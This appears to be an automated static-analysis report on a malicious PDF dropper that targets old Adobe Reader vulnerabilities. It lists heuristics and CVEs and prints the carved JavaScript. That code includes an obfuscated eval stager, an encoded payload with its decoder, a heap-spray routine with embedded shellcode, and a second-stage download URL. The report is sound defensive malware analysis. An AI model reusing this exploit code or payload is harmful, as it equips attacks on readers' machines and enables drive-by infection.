Malicious PDF — malware analysis report

Static analysis result for SHA-256 38e8f84e93dda2df…

MALICIOUS

PDF

40.5 KB First seen: 2012-07-12
MD5: 294bd6e5d4ecbf6a7b991f8f69f78c1f SHA-1: 8bda3ae957499414002e5cb5b3fd05b2485f5bd8 SHA-256: 38e8f84e93dda2df8f05bf31c9dab828d2b52b5901baf4f80dc1965f0c249b41
570 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1204.002 Malicious Link

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The critical CVE-2007-5659 heuristic specifically points to the use of `Collab.collectEmailInfo` to execute JavaScript, a known vulnerability. The ClamAV detection `Pdf.Dropper.Agent-7250098-0` further confirms its malicious nature. The extracted JavaScript files, particularly `legacy_pdfkit_stage_000.js` and `legacy_pdfkit_stage_001.js`, are likely responsible for downloading and executing a secondary payload, a common dropper behavior.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 14

  • Adobe Reader U3D auto-activated 3D annotation — CVE-2009-3459 critical CVE likely CVE_2009_2990_U3D_AUTOACTIVATE
    PDF contains a /Subtype /3D annotation that is configured to auto-activate on page view (/3DA <</A /PV /AIS /I>>) alongside a /U3D stream and JavaScript. This is the document shape used by CVE-2009-2990 (Adobe Reader U3D CLODProgressiveMeshDeclaration heap overflow, APSB09-15): the U3D parser runs without any user interaction once the page is rendered, while the accompanying JavaScript prepares a heap-spray to land controlled memory inside the corrupted allocation.
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • Adobe Reader U3D CLODProgressiveMeshDeclaration exploit critical CVE likely CVE_2009_3953
    PDF combines malformed U3D 3D content with JavaScript/action activation. CVE-2009-3953 is an Adobe Reader/Acrobat U3D CLODProgressiveMeshDeclaration array-boundary vulnerability triggered by malformed U3D data in a PDF.
  • U3D/3D content in PDF — Adobe Reader 3D parser CVE-family indicator high CVE related PDF_U3D_CVE_RELATED
    PDF contains U3D (Universal 3D) or 3D annotation content — CVE-2011-2462 and CVE-2009-3953 are critical vulnerabilities in Adobe Reader's U3D processing that allow arbitrary code execution. U3D content in PDFs is extremely rare in normal documents.
  • JavaScript action low 4 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB09-15 patch-range version gate (CVE-2009-3459) high CVE likely PDF_JS_ADOBE_APSB09_15_PATCH_GATE
    PDF JavaScript gates the exploit payload on an Adobe Reader version range that exactly matches the APSB09-15 patch boundary (< 9.2, < 8.1.7, < 7.1.4). That boundary fingerprints the CVE-2009-2990 / CVE-2009-3459 U3D parser vulnerabilities — no benign script tests all three Reader version-points together.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
    Matched line in script
    var Kx__88fbRF = new Array();var i_4qcf = 0;var GS_M_lnDT = "";function m_0j65_0M_S(Xs4XuS6N_w, OBUKC_s__724){var LG0T37Cp = OBUKC_s__724.toString();var W7g7NR7 = "";for(var p0__8tTM5__Y5 = 0; p0__8tTM5__Y5 < LG0T37Cp.length; p0__8tTM5__Y5++) {var C__Shei = parseInt(LG0T37Cp.substr(p0__8tTM5__Y5, 1));if (!isNaN(C__Shei)) {C__Shei = C__Shei.toString(16);if (C__Shei.length == 1) { C__Shei = "0" + C__Shei; }else if (C__Shei.length != 2) { C__Shei = "00"; }W7g7NR7 = C__Shei + W7g7NR7;}}while(W7g7NR7 …
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Dropper.Agent-7250098-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Dropper.Agent-7250098-0
  • Hex-obfuscated scripting name object critical PDF_OBFUSCATED_NAME_OBJECT
    A PDF name object that drives script execution (/JavaScript or /JS) is written with #XX hex escapes to hide it from string-based scanners — e.g. /J#61v#61S#63r#69p#74 decoding to /JavaScript. Legitimate PDF producers always write these names literally; hex-encoding an executable name is a deliberate evasion used by exploit-kit and dropper PDFs.
  • Annotation subject percent-decoding eval stager critical PDF_ANNOT_SUBJECT_MARKER_EVAL_STAGER
    OpenAction JavaScript forces annotation enumeration, reads an annotation /Subject payload with getAnnots(), rewrites marker bytes into percent escapes, decodes it with unescape(), and dispatches it through eval. This is a high-confidence exploit-kit staging pattern. It is intentionally not mapped to CVE-2009-1492 unless getAnnots() itself carries the crafted integer or long argument shape for that vulnerability.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://aghjpkfamlc.com/nte/PROX.php/yHf7928ea4V0100f060006R06330f21102Tbb949647203l000c Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0007_000.js pdf-javascript-stream PDF /JS object 7 at offset 0x1A4 343 bytes
SHA-256: 1847af0a099665b6ac45af66402e56ed64237a1b287618ee3d6643267fda6f35
Preview script
First 1,000 lines of the extracted script
em = ''; r = (r = 'l' + 'a' + em + 'ce', 'rep' + r); if (r && !em) {var z; var y; th = event.target; z = y = th; 
	 y = 0; 	 z['syncAn'+'notS'+'can'] ( ); y = z;var p = y['g'+'et'+'Annots']( {  nPage: 0 }) ;var s = p[0].subject;var l = s[r](/k /g, 'q%p'[r](/[qp]/g, ''));s = th['unes' + 'cape'] (l) ;var e = th[em + 'e'+ em + 'v'+'al']; e(s);}
legacy_pdfkit_stage_000.js deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x2F7 13122 bytes
SHA-256: 0922fb82da5dcb738c3be3f244d63a51916b431be92e698dc8c5ca2a29b96672
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function Qqwr_4E_4Y(qdqrey, Fae_bbD_C){  var m_rfB2 = 'um' + 'en' + "ts";m_rfB2 = 'a' + 'rg' + m_rfB2;var V5b_EM0w = Qqwr_4E_4Y[m_rfB2]["c" + "a" + "zzee"['r'+'epl'+'ace'](/zz/, 'll')];V5b_EM0w = V5b_EM0w["t"+"oS"+"t"+"r"+"ing"]();var g_2A4E_28 = 0;try {if (app) {g_2A4E_28++;g_2A4E_28++;}} catch(e) { }var r32_0J = new Array();if (qdqrey) { r32_0J = qdqrey;} else {var q8681T3URb = 0;var NgD__8__78_7Uap = 0;var e0D_o6_h_AF37p4 = 512;var cYk5_NOy14a = 52;cYk5_NOy14a = cYk5_NOy14a - 4;var u___w_7 = cYk5_NOy14a + 9;while(NgD__8__78_7Uap < V5b_EM0w.length) {var Xr754H__X_uqH8 = 1;var l1UA_PQ4as = V5b_EM0w['c'+'h'+'arC'+'odeAt'](NgD__8__78_7Uap);if (l1UA_PQ4as <= u___w_7 && l1UA_PQ4as >= cYk5_NOy14a) {if (q8681T3URb == 4) { q8681T3URb = 0; }if (isNaN(r32_0J[q8681T3URb])) {r32_0J[q8681T3URb] = 0;}r32_0J[q8681T3URb] += l1UA_PQ4as;if (r32_0J[q8681T3URb] > 512) {r32_0J[q8681T3URb] -= e0D_o6_h_AF37p4;}q8681T3URb++;}NgD__8__78_7Uap++;}}q8681T3URb = 4;for (var v_HYp____f = 0; v_HYp____f < 4; v_HYp____f++) {if (r32_0J[v_HYp____f] > 256) {r32_0J[v_HYp____f] -= 256;}}var Ei_m75G4BFk6HX4 = 0;var T0y_W26aru = "";var okT_7Tuo_C_4f0R = 0;var HrO_bM = 0;var NHppKL__0u3_4D;var P04B_T0A4s0_Kgb = 0;while(okT_7Tuo_C_4f0R < Fae_bbD_C.length) {var Lv6x_po = Fae_bbD_C.substr(okT_7Tuo_C_4f0R, 1) + "Z";var mdKIxh__5 = parseInt(Lv6x_po, 16);if (HrO_bM) {NHppKL__0u3_4D += mdKIxh__5;if (Ei_m75G4BFk6HX4 == 4) {Ei_m75G4BFk6HX4 -= 4;}var mXICAk_s = NHppKL__0u3_4D;mXICAk_s = mXICAk_s - (1 + P04B_T0A4s0_Kgb + 1) * r32_0J[Ei_m75G4BFk6HX4];if (mXICAk_s < 0) {          var U_E__155W4a = 256;mXICAk_s = mXICAk_s - Math['floor'](mXICAk_s / U_E__155W4a) * 256;}mXICAk_s = String['from' + 'CharCode'](mXICAk_s);if (g_2A4E_28 == 2) {T0y_W26aru += mXICAk_s;} else if (g_2A4E_28 == 1) {T0y_W26aru += mdKIxh__5;} else {T0y_W26aru += okT_7Tuo_C_4f0R;}Ei_m75G4BFk6HX4++;HrO_bM = 0;P04B_T0A4s0_Kgb++;} else {HrO_bM = 1;NHppKL__0u3_4D = mdKIxh__5 * 16;}okT_7Tuo_C_4f0R++;};var abcd=0; ;var M0_yR_Jh_2Kv_G = this;M0_yR_Jh_2Kv_G['ev'+'al'](T0y_W26aru);}
	Qqwr_4E_4Y(0, "54308A0AE55B8FD18E2FAE5C645180BFEE8DDD81AA740204A7C0D0433DD12114DED8375EEBE656D273B73875680C92E2F5129797C93FBE167A07A57A041DBB48137DFBDEC3921E128396F8E408803F32DBBE4BB2A2E6446A7BDA5EE821126C42CDF1ADF57D22E391550EBAEEDB6616A3E01F04115A67038929970817C28A42B7A992775D79C267A40AA5BC69E5FFD2EBBC06A0334529F104E61EDF81B92912D95E2CF84C1C3E5621283F7E9BE44B90F28D9E70BE3EA0853105C09D7A9F9BB01D3EFFC8C939DB2446E3EC27D9AB00003E2E2B3FBA1E264755F63594FFB082B48A394FC8DA19A2A8A6CAA4BD1991C4D56D19A8D84520F44272A906472D8A2069821BEF884B0C5695BBC46B7046593BB4B50562E838FDA8F205BAB9D08A32BA1FDA32C3255FD9E249E762B739631BE68928CEE759B3DD21B1204E2AC7B93563E54BC738B8E59D820F457E9C319A0F6B2361EDB260EFB3A1848159FB9A0330026853B4D89313A0E398755536DB221754CEAED36D1F3E92330D8F065811FA1D5B43C1BDA2804F83836D92F8A76A1ABDABA3E1ADF2E06F73EEB00F2B331B7FA24426C2663237894D6B551BE4836DA8D99F88E24F7C587C1373CBF2E9C6C7ADCAE0E9025BAFBA9A0AC5EB12130EFFE1891932392E1C18CD2952637AEB7048C562727789357DAAE1F5C0EDA9DEC0F41F5AC2D7A925CD0A01D8FF35C0CD1B50FA5EDB388BFE4A3841D14A67C0A82E6837322D90A4EE4A9861C19AC7E0987EE33A7FD12114DEE20890ABE247E77E0C67AF4011572ACEFC58A2DD07A847791DB6B95929F451F1830AD3C88AD8234C6003E3386B0875BEC529E9A1A8588765FC7600F9036E8EE31DBF1EA2E3AD6F1608B1DA2D0B1372D43017215F5B45B15B754E110A5B3D82807F3A0A4583A3A23CA8A751C7D3D5E1C3EDDE4172EEB00F2B331B7FA24426C2666208902B6247E7FE8C67AFC091572A5CAB9DB851C7B8F2C7A4888C8B9BFB0291BFFE9B39FAE53A0B163DC8B80248224BFF1ABAFA154B32035E5F01796992591E6C78CCED65905D96CAB82063CAF77736F4173FF8F907BA86D208FC72DD208DFE264F51D13182A99169AD6E877DCEA22556DF41D885C7CDC3AD1D8865CF29112C8F2D5FD9D424145EF0548D51FF8F1A27F48E7EAE4CC91C5207CCAE3B5AE5411047FDC9CC4C2B6877A9E8E531812876FCAC57BFA9D2425E26C4480827126063F021B92362E5925B314DE92CD25716A1E035EB3DA2823BA14C4725FAFB8753C1B2BE70634FB964B64FF0923508ECD2A296FEC36B7F0BCBFB2CE7D042CA3A0B03B347F8671A5C3C05156B7792EB6076F672B8B19418BFB1451AB0D6BEC7F3CF4846B1BDDF0AD3D21BBFD7E9B772F8112B2E5A61F0EA1B5871D1689DF2624660581E6C95CA138FC391CAC6E03367C1D48667F802F816F83EB9DA0F11FA9D265F9826438637F9188FD18843A32A6F2B9DA2276BCB69DEA2E80B7B9DDC5E7BD40AD031E43A9DEEF518FA95E269AF4ACB4BE2E2EB587C930EBC4885599E8D5573EF4DED75B8A77A7CFC45758B37D24B803636D2D871D478E6857479FB9A0330026852AACFA0098524E58A1F120537FA4AEBA3E357D8074A440BB855990802126B5FC196C36C374FC28FCB0B97851AC2C680F27EFED7427E07DDC72526014FA217E0069248378F59752817158936A6D7998736967A58BA1AB2AF0A1ABBB58FC1DAD91749BAC18A55191164B62310AA852A166140335AAA07137466DF668DF9B453A581705DBB121BB5B3A1DABCC92E5ADBD0A14DB72C1EF7C82FB1BFDC1108962A53D650388651C214669B9160AE1A3A77A8B2017EAE69BC87F2C0B2AC168176C3E0DFFB8F09539AFE101E7EC73B99280A521610DF756A8C0372F25107D4A2122EDF18FD41ECCC95432D5D756D10EE40983F37EDBE2AD6A5BB6F5D67FC80F7E2D8608EC6DF8B097022A2865812D019FD4C159A992AF3479A432FB11E9B3C27D79A5FBB936F550A85C266BA4AE59559C7EABFB49AFAA867381FF5002D3B103AC1FBF0C2780F0965656226FA2A855599A78A7FF47A9A80A935B4C52A0387A57A84ABB00459FAF7A022171E3FF5EC27D984173B4A6D2A59FF22133B32B76448D7623D7052206AA00905A4E58A9682C5DA64A609A80EA7E03509C918C6D4F4470F811A32AE0C3B7D58015798928317B82A716A98F6226CAD69E98CC5BB666CC84C2B7B3B0D1DA5209EE8D04FE795F63A864DF37F0D0F3490A78A1070F456178A955F72E84B0A74C0DA8A820F2A8A8B15AF31AA3937AE9B18F5A9A9588674D487CF21FA726EAC1BBD18A137D85B1652F430115DD675E17727357979F07D23470AFF175D208D7EBA772062D79EBF35ACA759C4D7BBF27EFED7427E07DDC72526014FA206E0D39B0F034A656226FA2A855599A78A7FF47A9AA87A49B28846FAB49DB9C1D4B53F59FFC8C939DB2446E3EC27D9AB00002D4BFF2AC5475F8671F83D5B0DBA8AAB71644F83E7DA6595A7A687B8EA54A612A762F42A38CAFF46B1D8DD1B4D9A2A6BB1440A95500F5193E6BF66B61A867CAEE41692D75BBFACC5F46E9CDB6F4EBA060101CE3C73AAAF1001A9CB3C8F51DE5414EFE8B3C1D23CBC37460FBD8D3747DF28FD52F7CEA353DE5E7BA52FEE3A75123EDDD22CBE9FD2434658C851BA3DF07377CA0E9E097D22D47B26F7B3F7D240D397BA5EFE296D72349B1662652FD5904CC1A4AE5B497EAC609213979D2DE7D7BFC8ADE2D76E53E3BE053B291B8EF4442E09661F04796D372407154A3C8CB35A52EB69B19DBE5FC5BEF2FB9ABDA6C1C1DF257DF3E19A15201667041A3CE3C13900766D5257E9146C4546F66674CB968968665D62900903A2BD91ADC0E7197497C0934DDE2A1509C805B1C5DA312386E720A7352E7722F9197FC57F72BE5B842BB8C40F92D750E963E4D36684C84A7A8B23D2219F3B5ADDBE6613A8B75D6D47F77F080D0297AEB303700F465CD6BF555EE1520337E9C9B995FB514B6C27D905942966B79A6EEBBC9374665FE68DF934D3A581F0CF95CAA722A09C2C0CE7EAFF4AF36AB25EEB02895C2F9F455E5139017D2C82A3A6774952C266C129A08370F3FD80FB7F11E16969FB06F1F629C857A2502E07B152399A5F2B12D72B503873A25095FB5E78686F5F8C800BD68CDD8C93E0E20793F1D09F13C8252BC6ECF89FC70410373E046DC02B284137FB3A5B00A840B5583293BACF2F75A36AAF7CFDEA64A1016763B71AFFE3B845B8990D4AFF97F235C344F48D5000136797CB2D7E5F4930D5E53057A92FFF63F6F8AC6C1D7F648FF3C733D4108FDEA865189CFB695F6711862814E4AD7ACD09B1F79B1FCA8F1B20F512013FCC8FCF85E854475C3DAA06831327038F2EBA8298854A39BC60BF37CC7085B2D4CDDD6DF8A0576B3ABB1DE20DC97DE4602AEA835F23B13A964053D79134A6D7C8620A578352974BB0782FC2B0D5BB7ED4A82F7FECC0C7F6EC1D53B210F0C45E1AF84C1F7829E2EF472DAFAB5B59F253B4717A23837547DF97A18A87F0B11783C8BDDF0AD3E023BB2CFDE082FB05776F102EBEEF684042B9374D0F724B705223A48CDAF2A595A7AEB9B81D57E0D1A525AFDD3FE2F531B68B1C1A0A58F325D71533501ABF5863A5865A6D6F423E97B6F394DD6CC369B5077EA90E4D27D0F0DAF4A7FD9FE0BA28145B0C386E280C453713F76D838F48800287208DCF122BB012C384FEA3BF55D5674C9DFEB2F7C01032C4C41DFF80AB40422BFC5FCCF9D06597B4138E0D5F38D6982B0BAD2FEA4DD17893741D028F4BF5C71657210DC7B030928E7F3D5F7E9A68D4FBEC802AC6C285F77ECFAB702F28F6F3FDFCCD8FB712F4D96364105A2E3A1527E6473BA097A0862365745DBF4FB98834CBDC9B8D97E1A55756C0FBA3FF18E122FB1AEDEF82FB1033335430ECFA233587BE3A8CFD6790708561627D1FEF75A5639BCCBEF2679EC5B71EB0E8FECF08008296D70D4F57F166C803444D4BCA4655E78B287D33378098E403519D7FBF66C0C46BBCE04A368EE517EE9F0B8C9FF856136DCC2DAF290D58F3D3346AAFD03675475C4A9E8E0770B717D472BDDF9256E0253BACF8B237AD0577BE9230C36FE8444569BE4D0FF4007056A3248E0D70F795A7590DBE1DD760D07AA232DD3F5F7500820B9C4B0BDA9C25D7917F481E3FD864A70EAF6D6FC5BE90B27314AD3A6DE3B507FBFADD4AA750F5D27326FD9F2F395618DB8C406DA35B45375E6F9E820FC88136DD9C8DCF92ACB6434304FDCC12D6D567F9EEF8DD774017343E121DFF002A4647AB7C8BD1794E65972E638CDDDFB8A764AD8DAD2F659DD37513F4ECFD0DCAF5C798D718124730379510333D5FCF1662A27B6C7D30787185F70380A83EAFA8C8C57B80CD8F328F23D4E3E4105AAEB4152766C73B9B17205926E5F45DBF9F09B6384B5C9D8B1233A557D671CDA07F98E3554D6CEDEF097F1864B3D42FC27DA835876CBC58CDE7107884B3E57D1F6CF3A7681B4CEEEFE21EC5B7D138EBFD4F8804831A600D4FD26E61C683C44B1D7D9855E706DDAC5CB70091B2B0049D7F70E5C3CAEB3CD852B90FE517A1513B5B1F7820E5E67B2DAFA65B842353B49E7B4FB57547D7CD9BBC87F0E51955C4BDDF1205E557BB2CFAAE87300577724328BDEF684874BC3D4D0F767D708523A48D0FF2A595A7A68AB91D57E0D8A452E3DD3FE2F500868B1C4B0F52EE25D71334794CBF5893A58B306D6F7741C5BAF394DE70F098B5077EAC0E8027D0F007F2D4FD9FB3BB55155B0C409B58104537E52468AF8F48B5048A1F8DCF152EB715C384D0CBBD84D567496DFDDCF7C01268BFC01DFF80A747422BFC5ECFF8CE6597AEDF8FE25F38A7662C0FAD2FE91BD7769374EA305D74F5C71C581A40C7B0369A94863D5F519366D3FBEC7E30C8ED85F78403AE3B2F28C6C5FC2ACD8FB80EF20763640E8E30691527EC7C3AA097A056F765735DBF1F838238CBDC9CC097ADA55750F4CDA2FF18E62ACDE7EDEF8431173233542CC2012C3587B93E5ED06790735431687D1FF078A36A9BCCBBEE689CC5B721AFED00CF08038299D80D4F58F1339203444B20CD1355E789277B2A378093B8014F9D7FBD63C5C46BBCDB4D3591E517F19F0B5D9FF823E46CCD2DAF25DC53F3D3346B7C9D0375475C199D8E0770B31BD441BDDF8D5CE3263BACFBAE05810577C1912BC16FE8434539B74D0FF5CB7685A3248BDA6DF395A72607BEEDD42601B2DE2D1A3E627B08B1456841FADF5B75D0C3C27B4B8AC858C70BD6992EF4B3B9CEA1FECC79622CC5E8FA0B2193CC07E0069248378F5975281715893163ADA181344EB46B8120BDB304F3C9CBABC4D1DF553ECCB89A52D7E022C6E7F8B5C82C522278532FE91569304FA680590CAB7A9F6A748E880CE8AFD5A0DDCBF0DA5C8BD27D64E02AEAF9060486BB061B0E74FC209FFE444B21D04D93A4A359AB4B7461BFF5EE4C9832F4A7C7F191BDD34A7A8EF8CBF9C40B7FC6E2361179F66C8322CB5DE2223086ACB246AF235B609DBC0A50B337EA6EDEC99D82143B4663E8C9457F1457ED922CDC8B9C4B8867F948E5F7FA7798B52678E75AEBC874374AE700111BF4838E2CD8FAA247008216571803D1B0339994B97B1C67C593C338CDA76DCDF1CFF46EC7EE6B7CD301E91338074FE3FBFDC26E2AF89B51506111EB7828769276552165B56FC12573C129F3D8C78FC3A6AB0B3E0AE3E23902E82AFC191AC0AD3C374F7F3E2DEB27134D32DB3A7DE6A1619F655D93A1DADA6E90ABA7C9F11991B316A11EE1F34727F945C0C91B514990DB6BD73105851BE34B66A97E20C370737D80F32D54D769D09205077667E53A247DFB082DE1F852EAB34F116E0B5C87270A7F1BE3DF756A9A0E70425646C792564FCD17FD6EF19F7A5FD0234872E8EA02AA3F3A02B345BFA9D2694731B251BA3D0C9F57DD0E9E09AF38A0522114A82F205013A5CF6F1DF24C38458249574BFF176B6392C171412597D991E4F6C5BF3BF1DFBFCB6EDC982C2CEEF60138E7D08AB23A1FDAB243255F596249E7D654286AAD4B90F28D9E70BE3EA0853105C09D7A9E9BB7174ECAB8DA0A020F2A0A0B15AFB12A3937390A21AA45418753E55B87E362467D426F8E8D091989CFA7EB87C337A6D309B51CE2273616F432A5DA165A3F42F820A54D3B844BFC1193E1C263AD5D8650CDE3378BC178F0A2B80DB9BC0A843C7BE2C4EA8F459DE1BD1000ADD8678E51F49DEBE920A8BA9836BC378759BCC34F60CF57123701C98E9413583F7245E047B94376F7CE66AAA3C85C6565BF69CFEA079F7ADD268F007C12D75B714DE92CD260D477CD3017307D44F08F0690470E139E669DC7B5381242CF8FCA35EE7F50D4DAC7A28CDC98422AD9B6B232260079F91216E48D56F8661A3B1EE3E74028B6EE4B8C21869EAF8140959F39C6A3889190ACA9029903F7DD3902FA6BCBEB38D99EFC347036112BB6EA153587B66A58FD679070852E927AD6DAAFCF8AD5CEBF1074BA076B29E0283AD8F92089D80047487328209FFE3A8D3DD05061BBBE2D7F357B6A94F331859847AA94000274BA0D8E56C42D070DE44C529CE4602264FD587164047F30FF2C60738CFF70034F22E57A4B61A00A0A6EF0C9D15A0634659EE8B6F2820E33C0881805B0E87E757AF09708E2EBB781E20ECDE09922E3642E2DB9E2DB0B1BB6E078D8459E7243B14571610FD6AB5FAE8FA386124C955C92F89CBD2AF5BBC3A7C3CFDB3A6DD5BCB232260079F91216E48D560165706462D21C4D67A9D1608A218D96A3A91E85700FC69498D299BEC62564D2DEAE1517185B09E52FDFC60C4E707D536BB230296F81E53C92F9A172AB81326184CA2079CFA1D58CF21991C20BA122B1E4EA10C92FC1C5DC523981126BC11201440A00198FE1B52CB2597162CBE10251A1450753F3F3BAAA10426784E01D21DE469DE9EF55E0A60971A866178EEAD020A6B8D947C3F28B5FCBBF526FE9510C2FFDDCCC9222143F72E8F74F9B5761F2BE6DC0A9D283443EDD59C2EBD6BD96DD22B709843CA5666636D4EB0659C873A12BD8EC4F8800B5168A0D4FD29E30C5807B385679BB8FE90DCD8A49F9B49BEBB4BFA07F3EE8EFC3252DFB4BABFB3B03AE5F068D666851240A80759FC1A094EAA3736DA91BB2B625D790A3D7DFF1E1543ED4EFC939DB0F28E50AE8B772FB1B786F5118D532375D5FE56660F9A1529F573F4F95CA1BB3E060E6C3FD217BD9137D54EE2AEAD20931C486EC35238130779850384F22F9549D92931778353250ADCB2D94EF40FC9CC7CAA5B8153A3E7B0B0A02BC2589D9BB4F116DF63D7B201785301533A0858A189D1B855CDF905464B71AFD800595854CD06D8C983A9A187C497101C657BC91C7477C26C448E52ADF8D6FDD0E900999FACF673732CD07FB4A15B9A4712101627241BF43555E3F14AE69D1CC8A81503A8B76A33FE6BB61F1BDA7D6850998482AF8E7F125FF0750D12EE9C2B90F1D8159622811EC665B5AAF4B66F397AEABB149859726DDD1A37ADFF8E9483EB7F9DA4AD1265BFB2E2DECA8305275774E66AA0730304BB43858CD624166424386B709F2A2A681C977C4DA6B99D175179F330F01F22F8AC5DD372D42F8209B0C004B25174C96927E18703F696ABFBA2D55C75DAA6FB0CB66C3243A47B21F01F6CE0E79CDA32EEF56D0366C1BCB9C3ECEDF586A8BFB95298546A0B9184AD302DA2FD08AD69FD0376D9627B231812F55AE9D35AA82A141492FA7A416E2BB60429FD79D019922A8912C26DBDAEE0BD762EA7BD80F81722F8A455D372DC2793D82957D491E438C50ED2FCC944DF1C3A1B776E4CF6969EBEFC8151AD155FF");
legacy_pdfkit_stage_001.js deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x2F7 5533 bytes
SHA-256: b48806a455f66bfcfc9027e4ff10c53b1dafe549b2ba86997c3eb481691c80ee
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var Kx__88fbRF = new Array();var i_4qcf = 0;var GS_M_lnDT = "";function m_0j65_0M_S(Xs4XuS6N_w, OBUKC_s__724){var LG0T37Cp = OBUKC_s__724.toString();var W7g7NR7 = "";for(var p0__8tTM5__Y5 = 0; p0__8tTM5__Y5 < LG0T37Cp.length; p0__8tTM5__Y5++) {var C__Shei = parseInt(LG0T37Cp.substr(p0__8tTM5__Y5, 1));if (!isNaN(C__Shei)) {C__Shei = C__Shei.toString(16);if (C__Shei.length == 1) { C__Shei = "0" + C__Shei; }else if (C__Shei.length != 2) { C__Shei = "00"; }W7g7NR7 = C__Shei + W7g7NR7;}}while(W7g7NR7.length < 8) { W7g7NR7 = "0" + W7g7NR7; }var s0f1_W5Hu_uNf7h = Xs4XuS6N_w.toString(16);if (s0f1_W5Hu_uNf7h.length == 1) { s0f1_W5Hu_uNf7h = "0" + s0f1_W5Hu_uNf7h; }else if (s0f1_W5Hu_uNf7h.length != 2) { s0f1_W5Hu_uNf7h = "00"; }W7g7NR7 = "3" + s0f1_W5Hu_uNf7h + "P" + W7g7NR7;return W7g7NR7;}function U5_Q4b(YLS_ToXy5V4DyyJ, dTY_e_r8e_r){var k_6HtnM_5__2L = new Array("");var lv_r63sxokOf = YLS_ToXy5V4DyyJ;var H_KauX;if ((H_KauX = YLS_ToXy5V4DyyJ.lastIndexOf("%u00")) != -1) {if (H_KauX + 6 == YLS_ToXy5V4DyyJ.length) {k_6HtnM_5__2L[0] = YLS_ToXy5V4DyyJ.substr(H_KauX + 4, 2);lv_r63sxokOf = YLS_ToXy5V4DyyJ.substring(0, H_KauX);}}H_KauX = 1;for (p0__8tTM5__Y5 = 0; p0__8tTM5__Y5 < dTY_e_r8e_r.length; p0__8tTM5__Y5++) {var lH03_6_2Tb = dTY_e_r8e_r.charCodeAt(p0__8tTM5__Y5).toString(16);if (lH03_6_2Tb.length == 1) { lH03_6_2Tb = "0" + lH03_6_2Tb; }k_6HtnM_5__2L[H_KauX] = lH03_6_2Tb;H_KauX++;}p0__8tTM5__Y5 = k_6HtnM_5__2L[0].length ? 0 : 1;k_6HtnM_5__2L[H_KauX] = "00";k_6HtnM_5__2L[H_KauX + 1] = "00";H_KauX += 2;if ((k_6HtnM_5__2L.length - p0__8tTM5__Y5) % 2) {k_6HtnM_5__2L[H_KauX] = "00";}while(p0__8tTM5__Y5 < k_6HtnM_5__2L.length) {lv_r63sxokOf += "%u" + k_6HtnM_5__2L[p0__8tTM5__Y5 + 1] + k_6HtnM_5__2L[p0__8tTM5__Y5];p0__8tTM5__Y5 += 2;}lv_r63sxokOf += "%u0000";return lv_r63sxokOf;}function tqNbHs_Q5y5b(U3UL_F_C_dI0, Os44U_34RA){while (U3UL_F_C_dI0.length*2<Os44U_34RA) {U3UL_F_C_dI0 += U3UL_F_C_dI0;}U3UL_F_C_dI0 = U3UL_F_C_dI0.substring(0,Os44U_34RA/2);return U3UL_F_C_dI0;}function t_s__Jy54p_L1Tn(D_38_I_M_7i__B, Q__rK_55__3IId, EW__8_6OS){var XBAs_F_0TA = 0x0c0c0c0c;var U3UL_F_C_dI0 = unescape(Q__rK_55__3IId);var dTY_e_r8e_r = m_0j65_0M_S(D_38_I_M_7i__B, EW__8_6OS);var y1ri__Hv_0b = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var YLS_ToXy5V4DyyJ = "%u9050%u9050%u9050%u9050" + 